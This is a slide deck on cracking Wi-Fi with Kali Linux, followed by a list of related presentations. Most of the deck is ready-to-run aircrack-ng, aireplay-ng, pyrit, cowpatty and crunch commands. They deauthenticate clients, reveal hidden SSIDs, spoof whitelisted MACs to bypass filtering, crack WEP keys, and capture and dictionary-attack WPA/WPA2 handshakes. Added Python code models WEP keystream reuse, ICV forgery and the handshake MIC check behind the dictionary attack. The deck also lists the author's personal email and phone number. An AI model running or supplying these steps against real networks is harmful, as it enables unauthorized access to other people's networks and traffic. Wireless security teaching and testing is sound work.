Wireless Cracking Using Kali
Asish Agarwalla
Terminology
• SSID (Service Set Identifier)
– An SSID is the Name of a Network
• BSSID (Basic Service Set Identifier)
– MAC address of the access point(AP)
• Wireless Client
Monitor Mode
• Monitor mode lets the interface capture all traffic received on the wireless medium without being associated with an access point or ad hoc network.
• Create a monitor mode interface
– airmon-ng start <wlan interface>
– Ex: airmon-ng start wlan0
Hidden SSID
• Passive Mode
– Use Wireshark/airodump-ng and wait for a client to connect to the AP
• airodump-ng --channel <channel> --bssid xx:xx:xx:xx:xx:xx <monitor interface>
• Active Mode
– Send de-authentication packets with aireplay-ng and use Wireshark/airodump-ng to monitor the traffic.
– aireplay-ng --deauth 0 -a <bssid> <monitor mode interface>
The Probe Request and Probe Response packets exchanged when a client reconnects contain the SSID of the network.
Mac Filtering Bypass
• Passive Mode
– Use Wireshark/airodump-ng and wait for a client to connect to the AP
– airodump-ng --channel <channel> --bssid xx:xx:xx:xx:xx:xx <monitor interface>
• Active Mode
– Force all connected clients to authenticate again by sending de-authentication packets with aireplay-ng, and use Wireshark/airodump-ng to monitor the traffic
– aireplay-ng --deauth 0 -a <bssid> <monitor mode interface>
Once we find a whitelisted client's MAC address, we can spoof that MAC address using the macchanger utility.
WEP (Wired Equivalent Privacy)
Wireless Security
• Two types of WEP authentication
– Open System Authentication
– Shared Key Authentication
• Encrypts all network packets using
– a stream cipher (RC4) for confidentiality
– a checksum (CRC-32) for integrity, known as the ICV (Integrity Check Value)
• 64-bit key = 24-bit IV + 40-bit secret key
• 128-bit key = 24-bit IV + 104-bit secret key
WEP Encryption
[Diagram: the IV (24 bit) and the Secret Key (40 bit) are concatenated and fed to the RC4 Algorithm; the resulting keystream is XORed with Data + ICV to produce the Cipher Text + encrypted ICV, sent after the IV in the clear]
WEP Weakness
• The IV is only 24 bits, so it must repeat after at most 2^24 (~16.7M) packets, and a repeated IV under the same key means a repeated RC4 keystream
• The IV is sent in clear text
• CRC-32 is a linear checksum, not a cryptographic MAC, so it cannot authenticate the message
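To make the two weaknesses above concrete, here is an added Python illustration of a minimal WEP frame (not from the original slides): the 40-bit key, 24-bit IV and plaintexts are constructed values. It shows that once one frame's plaintext is known, every other frame sent under the same IV decrypts with the recovered keystream, and that CRC-32 linearity lets a frame be altered with the ICV still verifying, which is why WEP is retired rather than hardened.

```python
from zlib import crc32


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA). WEP keys RC4 with IV || secret key."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(secret_key: bytes, iv: bytes, data: bytes) -> bytes:
    """Frame body as WEP sends it: IV in the clear, then RC4(data || ICV)."""
    icv = crc32(data).to_bytes(4, "little")
    return iv + rc4(iv + secret_key, data + icv)


def wep_decrypt(secret_key: bytes, frame: bytes):
    """Receiver side: decrypt and report whether the ICV check passes."""
    iv, body = frame[:3], frame[3:]
    plain = rc4(iv + secret_key, body)
    data, icv = plain[:-4], plain[-4:]
    return data, icv == crc32(data).to_bytes(4, "little")


# Weakness 1: the 24-bit IV is sent in clear and repeats, so keystreams repeat.
def keystream_from_known_plaintext(frame: bytes, known: bytes) -> bytes:
    """If one frame's plaintext is known, its keystream is ciphertext XOR plaintext."""
    return xor(frame[3:3 + len(known)], known)


def decrypt_with_reused_keystream(frame: bytes, keystream: bytes) -> bytes:
    """Any other frame sent under the same IV and key falls to that keystream."""
    return xor(frame[3:3 + len(keystream)], keystream)


# Weakness 2: CRC-32 is linear: crc(a ^ b) == crc(a) ^ crc(b) ^ crc(zeros).
def crc32_is_linear(a: bytes, b: bytes) -> bool:
    return crc32(xor(a, b)) == crc32(a) ^ crc32(b) ^ crc32(bytes(len(a)))


def flip_bits_undetected(frame: bytes, delta: bytes) -> bytes:
    """Flip the plaintext bits in `delta` by flipping the same ciphertext bits and
    correct the encrypted ICV using linearity alone, without knowing the key."""
    iv, body = frame[:3], frame[3:]
    enc_data, enc_icv = body[:-4], body[-4:]
    icv_delta = (crc32(delta) ^ crc32(bytes(len(delta)))).to_bytes(4, "little")
    return iv + xor(enc_data, delta) + xor(enc_icv, icv_delta)
```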
WEP Cracking
1. Start monitor mode: airmon-ng start wlan0
2. Identify the target BSSID, SSID and channel using airodump-ng:
airodump-ng mon0
3. Configure the monitor interface to listen on the target channel:
iwconfig mon0 channel <no>
4. Capture the packets using airodump-ng:
airodump-ng --bssid <BSSID> --channel <no> -w <filename> mon0
5. Broadcast deauth packets: aireplay-ng -0 0 -a <BSSID> mon0
6. Send deauth packets to a specific client:
aireplay-ng -0 0 -a <BSSID> -c <mac of associated client> mon0
7. Fake authentication:
aireplay-ng -1 0 -e <ssid> -a <bssid> -h <attacker machine / spoofed mac address> mon0
8. Generate data packets using ARP replay:
aireplay-ng -3 -b <bssid> -h <attacker machine / connected client mac address> mon0
9. Crack: aircrack-ng <file.cap>
WEP Packet Decrypting
1. airdecap-ng -w <shared key> <captured_file.cap>
2. The decrypted packets are written to a file named captured_file-dec.cap
3. Open captured_file-dec.cap in Wireshark
WPA/WPA2
• WPA uses the TKIP encryption algorithm
• WPA2 mandatorily uses the AES-CCMP algorithm for encryption
• WPA and WPA2 support PSK and EAP-based authentication
• WPA/WPA2 PSK is vulnerable to an offline dictionary attack against the captured handshake
WPA/WPA2 4 Ways Handshake
• Both the client and the AP generate the Pairwise Master Key (PMK)
• The PMK is derived from the WPA/WPA2 PSK passphrase supplied by the user together with the SSID. The combination of the two is passed through the Password Based Key Derivation Function (PBKDF2), which outputs the 256-bit shared key.
• The AP sends a pseudo-randomly generated ANonce to the device.
• The device generates its own pseudo-random SNonce.
• The device then uses these two nonces, the MAC address of the AP, the MAC address of the device, and the PMK to create a key called the Pairwise Temporal Key (PTK), which is 64 bytes, or 512 bits, in length.
• The device sends its SNonce and a MIC to the AP
• The AP now calculates the PTK from the same five parameters and compares its MIC (message integrity code) with the MIC the client sent
• If both match, the AP sends its ANonce again, authenticated with a MIC computed from the PTK, along with the key installation message
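The key hierarchy just described, carried through as an added Python example (not from the original slides): the MAC addresses, nonces, SSID and passphrase are constructed values, and the EAPOL-Key frame layout is the standard 802.11i one. It walks passphrase and SSID to the PMK, the PMK and the five handshake parameters to the PTK, and the PTK's KCK to the MIC on message 2, then shows the AP's check; because only the passphrase is secret, that same check repeated per candidate is the dictionary attack, so passphrase strength is the entire defence of a PSK network.

```python
import hashlib
import hmac

MIC_OFFSET = 81  # EAPOL header (4) + descriptor fields preceding the 16-byte MIC


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: four HMAC-SHA1 blocks, truncated to 64 bytes."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, client_mac: bytes,
               anonce: bytes, snonce: bytes) -> bytes:
    """PTK from the five values the slides list: PMK, both MACs, both nonces.
    The first 16 bytes (KCK) are identical for CCMP's shorter PRF-384 output."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)


def build_message2(snonce: bytes, mic: bytes = bytes(16)) -> bytes:
    """Constructed EAPOL-Key message 2 (client -> AP) with a WPA2/CCMP key-info
    field and empty key data; only the layout matters for the MIC."""
    body = (bytes([0x02])                        # descriptor type: RSN
            + bytes([0x01, 0x0A])                # key info: MIC, pairwise, version 2
            + (16).to_bytes(2, "big")            # key length (CCMP)
            + (1).to_bytes(8, "big")             # replay counter
            + snonce                             # key nonce = SNonce
            + bytes(16) + bytes(8) + bytes(8)    # key IV, RSC, key ID
            + mic                                # key MIC
            + (0).to_bytes(2, "big"))            # key data length
    return bytes([0x01, 0x03]) + len(body).to_bytes(2, "big") + body


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """WPA2 (descriptor version 2): HMAC-SHA1 over the frame with the MIC field
    zeroed, truncated to 16 bytes. WPA/TKIP (version 1) uses HMAC-MD5 instead."""
    zeroed = frame[:MIC_OFFSET] + bytes(16) + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def client_message2(passphrase: str, ssid: str, ap_mac: bytes, client_mac: bytes,
                    anonce: bytes, snonce: bytes) -> bytes:
    """Supplicant side: derive PMK and PTK, then send SNonce with a MIC."""
    ptk = derive_ptk(derive_pmk(passphrase, ssid), ap_mac, client_mac, anonce, snonce)
    kck = ptk[:16]  # Key Confirmation Key: the first 128 bits of the PTK
    return build_message2(snonce, eapol_mic(kck, build_message2(snonce)))


def ap_accepts(passphrase: str, ssid: str, ap_mac: bytes, client_mac: bytes,
               anonce: bytes, frame: bytes) -> bool:
    """AP side: recompute the PTK from the same five values and compare MICs.
    Run over a wordlist against a captured message 2, this is the offline
    dictionary attack: nothing it needs is secret except the passphrase."""
    snonce = frame[17:49]
    ptk = derive_ptk(derive_pmk(passphrase, ssid), ap_mac, client_mac, anonce, snonce)
    return hmac.compare_digest(eapol_mic(ptk[:16], frame),
                               frame[MIC_OFFSET:MIC_OFFSET + 16])
```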
WPA/WPA2 Dictionary Attack
WPA/WPA2 Cracking
1. Start monitor mode: airmon-ng start wlan0
2. Identify the target BSSID, SSID and channel using airodump-ng:
airodump-ng mon0
3. Configure the monitor interface to listen on the target channel:
iwconfig mon0 channel <no>
4. Capture the packets, including the 4-way handshake, using airodump-ng:
airodump-ng --bssid <BSSID> --channel <no> -w <filename> mon0
5. Broadcast deauth packets: aireplay-ng -0 0 -a <BSSID> mon0
6. Crack: aircrack-ng -w <password file> <file.cap>
Speeding up WPA/WPA2 PSK cracking
with PMK
• Generate PMKs: genpmk -f <password file> -d <output file> -s "SSID"
• Crack with cowpatty: cowpatty -d <pmk file> -s "SSID" -r <captured file>
• Crack with pyrit: pyrit -r <captured file> -i <pmk file> attack_cowpatty
• Import passwords into pyrit
– pyrit -i <password file> import_passwords
• Create an ESSID in pyrit
– pyrit -e <ssid> create_essid
• Generate PMKs
– pyrit batch
• Crack using the PMK database
– pyrit -r <captured file> attack_db
Password File
• crunch <min> <max> <charset> -t <pattern>
• Ex: crunch 10 10 1234567890 -t 98767@@@@@
Thanks
asishagarwalla@gmail.com
9379773260

Contenu connexe

Tendances

Wifi cracking Step by Step Using CMD and Kali Linux 2018
Wifi cracking Step by Step Using CMD and Kali Linux 2018Wifi cracking Step by Step Using CMD and Kali Linux 2018
Wifi cracking Step by Step Using CMD and Kali Linux 2018Mohammad Fareed
 
How Hack WiFi through Aircrack-ng in Kali Linux Cyber Security
How Hack WiFi through Aircrack-ng in Kali Linux Cyber SecurityHow Hack WiFi through Aircrack-ng in Kali Linux Cyber Security
How Hack WiFi through Aircrack-ng in Kali Linux Cyber SecurityAhmad Yar
 
Wireless security using wpa2
Wireless security using wpa2Wireless security using wpa2
Wireless security using wpa2Tushar Anand
 
Getting Started With WebAuthn
Getting Started With WebAuthnGetting Started With WebAuthn
Getting Started With WebAuthnFIDO Alliance
 
Wi-Fi security – WEP, WPA and WPA2
Wi-Fi security – WEP, WPA and WPA2Wi-Fi security – WEP, WPA and WPA2
Wi-Fi security – WEP, WPA and WPA2Fábio Afonso
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) securityNahidul Kibria
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Amit Tyagi
 
Hacking SIP Like a Boss!
Hacking SIP Like a Boss!Hacking SIP Like a Boss!
Hacking SIP Like a Boss!Fatih Ozavci
 
Network Penetration Testing
Network Penetration TestingNetwork Penetration Testing
Network Penetration TestingMohammed Adam
 
Brute force-attack presentation
Brute force-attack presentationBrute force-attack presentation
Brute force-attack presentationMahmoud Ibra
 
remote-method-guesser - BHUSA2021 Arsenal
remote-method-guesser - BHUSA2021 Arsenal remote-method-guesser - BHUSA2021 Arsenal
remote-method-guesser - BHUSA2021 Arsenal Tobias Neitzel
 

Tendances (20)

Wifi cracking Step by Step Using CMD and Kali Linux 2018
Wifi cracking Step by Step Using CMD and Kali Linux 2018Wifi cracking Step by Step Using CMD and Kali Linux 2018
Wifi cracking Step by Step Using CMD and Kali Linux 2018
 
How Hack WiFi through Aircrack-ng in Kali Linux Cyber Security
How Hack WiFi through Aircrack-ng in Kali Linux Cyber SecurityHow Hack WiFi through Aircrack-ng in Kali Linux Cyber Security
How Hack WiFi through Aircrack-ng in Kali Linux Cyber Security
 
Cracking WPA/WPA2 with Non-Dictionary Attacks
Cracking WPA/WPA2 with Non-Dictionary AttacksCracking WPA/WPA2 with Non-Dictionary Attacks
Cracking WPA/WPA2 with Non-Dictionary Attacks
 
Vulnerability Assessment Report
Vulnerability Assessment ReportVulnerability Assessment Report
Vulnerability Assessment Report
 
Wireless security using wpa2
Wireless security using wpa2Wireless security using wpa2
Wireless security using wpa2
 
Getting Started With WebAuthn
Getting Started With WebAuthnGetting Started With WebAuthn
Getting Started With WebAuthn
 
WiFi Secuiry: Attack & Defence
WiFi Secuiry: Attack & DefenceWiFi Secuiry: Attack & Defence
WiFi Secuiry: Attack & Defence
 
Wireless hacking
Wireless hackingWireless hacking
Wireless hacking
 
Wi-Fi security – WEP, WPA and WPA2
Wi-Fi security – WEP, WPA and WPA2Wi-Fi security – WEP, WPA and WPA2
Wi-Fi security – WEP, WPA and WPA2
 
Command injection
Command injectionCommand injection
Command injection
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) security
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
 
KRACK attack
KRACK attackKRACK attack
KRACK attack
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)
 
Hacking SIP Like a Boss!
Hacking SIP Like a Boss!Hacking SIP Like a Boss!
Hacking SIP Like a Boss!
 
Ceh v5 module 14 sql injection
Ceh v5 module 14 sql injectionCeh v5 module 14 sql injection
Ceh v5 module 14 sql injection
 
Network Penetration Testing
Network Penetration TestingNetwork Penetration Testing
Network Penetration Testing
 
Pentest with Metasploit
Pentest with MetasploitPentest with Metasploit
Pentest with Metasploit
 
Brute force-attack presentation
Brute force-attack presentationBrute force-attack presentation
Brute force-attack presentation
 
remote-method-guesser - BHUSA2021 Arsenal
remote-method-guesser - BHUSA2021 Arsenal remote-method-guesser - BHUSA2021 Arsenal
remote-method-guesser - BHUSA2021 Arsenal
 

En vedette

802.11r Explained.
802.11r Explained. 802.11r Explained.
802.11r Explained. Ajay Gupta
 
Wireless Security null seminar
Wireless Security null seminarWireless Security null seminar
Wireless Security null seminarNilesh Sapariya
 
Raúl Siles - Wi-Fi: Why iOS (Android and others) Fail inexplicably? [Rooted C...
Raúl Siles - Wi-Fi: Why iOS (Android and others) Fail inexplicably? [Rooted C...Raúl Siles - Wi-Fi: Why iOS (Android and others) Fail inexplicably? [Rooted C...
Raúl Siles - Wi-Fi: Why iOS (Android and others) Fail inexplicably? [Rooted C...RootedCON
 
New flaws in WPA-TKIP
New flaws in WPA-TKIPNew flaws in WPA-TKIP
New flaws in WPA-TKIPvanhoefm
 
Ahmad Siddiq Wi-Fi Ninjutsu Exploitation
Ahmad Siddiq Wi-Fi Ninjutsu ExploitationAhmad Siddiq Wi-Fi Ninjutsu Exploitation
Ahmad Siddiq Wi-Fi Ninjutsu Exploitationbarcamp.my
 
Exploiting WiFi Security
Exploiting WiFi Security Exploiting WiFi Security
Exploiting WiFi Security Hariraj Rathod
 
Cracking wpa2 psk in the cloud
Cracking wpa2 psk in the cloudCracking wpa2 psk in the cloud
Cracking wpa2 psk in the cloudFotios Lindiakos
 
Networking- OSI Layer Protocol Functions
Networking- OSI Layer Protocol FunctionsNetworking- OSI Layer Protocol Functions
Networking- OSI Layer Protocol FunctionsGayathri Kesavan
 
Wi-Fi Hotspot Attacks
Wi-Fi Hotspot AttacksWi-Fi Hotspot Attacks
Wi-Fi Hotspot AttacksGreg Foss
 
A tutorial showing you how to crack wifi passwords using kali linux!
A tutorial showing you how to crack wifi passwords using kali linux!A tutorial showing you how to crack wifi passwords using kali linux!
A tutorial showing you how to crack wifi passwords using kali linux!edwardo
 
Wireless security presentation
Wireless security presentationWireless security presentation
Wireless security presentationMuhammad Zia
 
A Guide to 802.11 WiFi Security by US-CERT
A Guide to 802.11 WiFi Security by US-CERTA Guide to 802.11 WiFi Security by US-CERT
A Guide to 802.11 WiFi Security by US-CERTDavid Sweigert
 

En vedette (15)

Wpa vs Wpa2
Wpa vs Wpa2Wpa vs Wpa2
Wpa vs Wpa2
 
WPA2
WPA2WPA2
WPA2
 
802.11r Explained.
802.11r Explained. 802.11r Explained.
802.11r Explained.
 
Wireless Security null seminar
Wireless Security null seminarWireless Security null seminar
Wireless Security null seminar
 
Raúl Siles - Wi-Fi: Why iOS (Android and others) Fail inexplicably? [Rooted C...
Raúl Siles - Wi-Fi: Why iOS (Android and others) Fail inexplicably? [Rooted C...Raúl Siles - Wi-Fi: Why iOS (Android and others) Fail inexplicably? [Rooted C...
Raúl Siles - Wi-Fi: Why iOS (Android and others) Fail inexplicably? [Rooted C...
 
New flaws in WPA-TKIP
New flaws in WPA-TKIPNew flaws in WPA-TKIP
New flaws in WPA-TKIP
 
Ahmad Siddiq Wi-Fi Ninjutsu Exploitation
Ahmad Siddiq Wi-Fi Ninjutsu ExploitationAhmad Siddiq Wi-Fi Ninjutsu Exploitation
Ahmad Siddiq Wi-Fi Ninjutsu Exploitation
 
Exploiting WiFi Security
Exploiting WiFi Security Exploiting WiFi Security
Exploiting WiFi Security
 
Cracking wpa2 psk in the cloud
Cracking wpa2 psk in the cloudCracking wpa2 psk in the cloud
Cracking wpa2 psk in the cloud
 
Networking- OSI Layer Protocol Functions
Networking- OSI Layer Protocol FunctionsNetworking- OSI Layer Protocol Functions
Networking- OSI Layer Protocol Functions
 
Wi-Fi Hotspot Attacks
Wi-Fi Hotspot AttacksWi-Fi Hotspot Attacks
Wi-Fi Hotspot Attacks
 
A tutorial showing you how to crack wifi passwords using kali linux!
A tutorial showing you how to crack wifi passwords using kali linux!A tutorial showing you how to crack wifi passwords using kali linux!
A tutorial showing you how to crack wifi passwords using kali linux!
 
Ch06 Wireless Network Security
Ch06 Wireless Network SecurityCh06 Wireless Network Security
Ch06 Wireless Network Security
 
Wireless security presentation
Wireless security presentationWireless security presentation
Wireless security presentation
 
A Guide to 802.11 WiFi Security by US-CERT
A Guide to 802.11 WiFi Security by US-CERTA Guide to 802.11 WiFi Security by US-CERT
A Guide to 802.11 WiFi Security by US-CERT
 

Similaire à Wireless Cracking using Kali

Wireless Pentest & Capturing a WPA2 Four-Way Handshake
Wireless Pentest & Capturing a WPA2 Four-Way HandshakeWireless Pentest & Capturing a WPA2 Four-Way Handshake
Wireless Pentest & Capturing a WPA2 Four-Way Handshakedata68
 
5169 wireless network_security_amine_k
5169 wireless network_security_amine_k5169 wireless network_security_amine_k
5169 wireless network_security_amine_kRama Krishna M
 
cracking WPA/WPA2 encrypted Wi-fi network using backtrack
cracking WPA/WPA2 encrypted Wi-fi network using backtrackcracking WPA/WPA2 encrypted Wi-fi network using backtrack
cracking WPA/WPA2 encrypted Wi-fi network using backtrackBidhan Ghimire
 
Cracking WEP Secured Wireless Networks
Cracking WEP Secured Wireless NetworksCracking WEP Secured Wireless Networks
Cracking WEP Secured Wireless NetworksHammam Samara
 
Dos on 802.11 and other security issues ( Case Study )
Dos on 802.11 and other security issues ( Case Study ) Dos on 802.11 and other security issues ( Case Study )
Dos on 802.11 and other security issues ( Case Study ) Shrobon Biswas
 
Wi fi pentesting
Wi fi pentestingWi fi pentesting
Wi fi pentestingMihir Shah
 
Cracking wep and wpa wireless networks
Cracking wep and wpa wireless networksCracking wep and wpa wireless networks
Cracking wep and wpa wireless networksMaghan Das
 
Deep Dive - Amazon Virtual Private Cloud (VPC)
Deep Dive - Amazon Virtual Private Cloud (VPC)Deep Dive - Amazon Virtual Private Cloud (VPC)
Deep Dive - Amazon Virtual Private Cloud (VPC)Amazon Web Services
 
Nexus 1000v part ii
Nexus 1000v part iiNexus 1000v part ii
Nexus 1000v part iiKrunal Shah
 
Creating Your Virtual Data Center: VPC Fundamentals and Connectivity
Creating Your Virtual Data Center: VPC Fundamentals and ConnectivityCreating Your Virtual Data Center: VPC Fundamentals and Connectivity
Creating Your Virtual Data Center: VPC Fundamentals and ConnectivityAmazon Web Services
 
Konfigurasi DHCP Nano Station
Konfigurasi DHCP Nano StationKonfigurasi DHCP Nano Station
Konfigurasi DHCP Nano StationIbnu Syina
 
4 wifi security
4 wifi security4 wifi security
4 wifi securityal-sari7
 
VM Console Enhancements
VM Console EnhancementsVM Console Enhancements
VM Console EnhancementsShapeBlue
 
VPC Fundamentals & Connectivity - Pop-up Loft Tel Aviv
VPC Fundamentals & Connectivity - Pop-up Loft Tel AvivVPC Fundamentals & Connectivity - Pop-up Loft Tel Aviv
VPC Fundamentals & Connectivity - Pop-up Loft Tel AvivAmazon Web Services
 
Creating Your Virtual Data Center: Amazon VPC Fundamentals and Connectivity O...
Creating Your Virtual Data Center: Amazon VPC Fundamentals and Connectivity O...Creating Your Virtual Data Center: Amazon VPC Fundamentals and Connectivity O...
Creating Your Virtual Data Center: Amazon VPC Fundamentals and Connectivity O...Amazon Web Services
 
Protect Your DHCP Infrastructure from Cyber Attacks - Cybersecurity Training ...
Protect Your DHCP Infrastructure from Cyber Attacks - Cybersecurity Training ...Protect Your DHCP Infrastructure from Cyber Attacks - Cybersecurity Training ...
Protect Your DHCP Infrastructure from Cyber Attacks - Cybersecurity Training ...Jiunn-Jer Sun
 

Similaire à Wireless Cracking using Kali (20)

Wireless Pentest & Capturing a WPA2 Four-Way Handshake
Wireless Pentest & Capturing a WPA2 Four-Way HandshakeWireless Pentest & Capturing a WPA2 Four-Way Handshake
Wireless Pentest & Capturing a WPA2 Four-Way Handshake
 
Wifi cracking
Wifi crackingWifi cracking
Wifi cracking
 
5169 wireless network_security_amine_k
5169 wireless network_security_amine_k5169 wireless network_security_amine_k
5169 wireless network_security_amine_k
 
cracking WPA/WPA2 encrypted Wi-fi network using backtrack
cracking WPA/WPA2 encrypted Wi-fi network using backtrackcracking WPA/WPA2 encrypted Wi-fi network using backtrack
cracking WPA/WPA2 encrypted Wi-fi network using backtrack
 
Cracking WEP Secured Wireless Networks
Cracking WEP Secured Wireless NetworksCracking WEP Secured Wireless Networks
Cracking WEP Secured Wireless Networks
 
Dos on 802.11 and other security issues ( Case Study )
Dos on 802.11 and other security issues ( Case Study ) Dos on 802.11 and other security issues ( Case Study )
Dos on 802.11 and other security issues ( Case Study )
 
Wi fi pentesting
Wi fi pentestingWi fi pentesting
Wi fi pentesting
 
Cracking wep and wpa wireless networks
Cracking wep and wpa wireless networksCracking wep and wpa wireless networks
Cracking wep and wpa wireless networks
 
Deep Dive - Amazon Virtual Private Cloud (VPC)
Deep Dive - Amazon Virtual Private Cloud (VPC)Deep Dive - Amazon Virtual Private Cloud (VPC)
Deep Dive - Amazon Virtual Private Cloud (VPC)
 
Nexus 1000v part ii
Nexus 1000v part iiNexus 1000v part ii
Nexus 1000v part ii
 
Creating Your Virtual Data Center: VPC Fundamentals and Connectivity
Creating Your Virtual Data Center: VPC Fundamentals and ConnectivityCreating Your Virtual Data Center: VPC Fundamentals and Connectivity
Creating Your Virtual Data Center: VPC Fundamentals and Connectivity
 
Konfigurasi DHCP Nano Station
Konfigurasi DHCP Nano StationKonfigurasi DHCP Nano Station
Konfigurasi DHCP Nano Station
 
4 wifi security
4 wifi security4 wifi security
4 wifi security
 
1-300-206 (SENSS)=Firewall (642-618)
1-300-206 (SENSS)=Firewall (642-618) 1-300-206 (SENSS)=Firewall (642-618)
1-300-206 (SENSS)=Firewall (642-618)
 
VM Console Enhancements
VM Console EnhancementsVM Console Enhancements
VM Console Enhancements
 
Wifi hacking
Wifi hackingWifi hacking
Wifi hacking
 
EMEA Airheads- Manage Devices at Branch Office (BOC)
EMEA Airheads- Manage Devices at Branch Office (BOC)EMEA Airheads- Manage Devices at Branch Office (BOC)
EMEA Airheads- Manage Devices at Branch Office (BOC)
 
VPC Fundamentals & Connectivity - Pop-up Loft Tel Aviv
VPC Fundamentals & Connectivity - Pop-up Loft Tel AvivVPC Fundamentals & Connectivity - Pop-up Loft Tel Aviv
VPC Fundamentals & Connectivity - Pop-up Loft Tel Aviv
 
Creating Your Virtual Data Center: Amazon VPC Fundamentals and Connectivity O...
Creating Your Virtual Data Center: Amazon VPC Fundamentals and Connectivity O...Creating Your Virtual Data Center: Amazon VPC Fundamentals and Connectivity O...
Creating Your Virtual Data Center: Amazon VPC Fundamentals and Connectivity O...
 
Protect Your DHCP Infrastructure from Cyber Attacks - Cybersecurity Training ...
Protect Your DHCP Infrastructure from Cyber Attacks - Cybersecurity Training ...Protect Your DHCP Infrastructure from Cyber Attacks - Cybersecurity Training ...
Protect Your DHCP Infrastructure from Cyber Attacks - Cybersecurity Training ...
 

Plus de n|u - The Open Security Community

Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...n|u - The Open Security Community
 

Plus de n|u - The Open Security Community (20)

Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)
 
Osint primer
Osint primerOsint primer
Osint primer
 
SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationship
 
Nmap basics
Nmap basicsNmap basics
Nmap basics
 
Metasploit primary
Metasploit primaryMetasploit primary
Metasploit primary
 
Api security-testing
Api security-testingApi security-testing
Api security-testing
 
Introduction to TLS 1.3
Introduction to TLS 1.3Introduction to TLS 1.3
Introduction to TLS 1.3
 
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
 
Talking About SSRF,CRLF
Talking About SSRF,CRLFTalking About SSRF,CRLF
Talking About SSRF,CRLF
 
Building active directory lab for red teaming
Building active directory lab for red teamingBuilding active directory lab for red teaming
Building active directory lab for red teaming
 
Owning a company through their logs
Owning a company through their logsOwning a company through their logs
Owning a company through their logs
 
Introduction to shodan
Introduction to shodanIntroduction to shodan
Introduction to shodan
 
Cloud security
Cloud security Cloud security
Cloud security
 
Detecting persistence in windows
Detecting persistence in windowsDetecting persistence in windows
Detecting persistence in windows
 
Frida - Objection Tool Usage
Frida - Objection Tool UsageFrida - Objection Tool Usage
Frida - Objection Tool Usage
 
OSQuery - Monitoring System Process
OSQuery - Monitoring System ProcessOSQuery - Monitoring System Process
OSQuery - Monitoring System Process
 
DevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -SecurityDevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -Security
 
Extensible markup language attacks
Extensible markup language attacksExtensible markup language attacks
Extensible markup language attacks
 
Linux for hackers
Linux for hackersLinux for hackers
Linux for hackers
 
Android Pentesting
Android PentestingAndroid Pentesting
Android Pentesting
 

Dernier

Z Score,T Score, Percential Rank and Box Plot Graph
Z Score,T Score, Percential Rank and Box Plot GraphZ Score,T Score, Percential Rank and Box Plot Graph
Z Score,T Score, Percential Rank and Box Plot GraphThiyagu K
 
Beyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global ImpactBeyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global ImpactPECB
 
1029 - Danh muc Sach Giao Khoa 10 . pdf
1029 -  Danh muc Sach Giao Khoa 10 . pdf1029 -  Danh muc Sach Giao Khoa 10 . pdf
1029 - Danh muc Sach Giao Khoa 10 . pdfQucHHunhnh
 
social pharmacy d-pharm 1st year by Pragati K. Mahajan
social pharmacy d-pharm 1st year by Pragati K. Mahajansocial pharmacy d-pharm 1st year by Pragati K. Mahajan
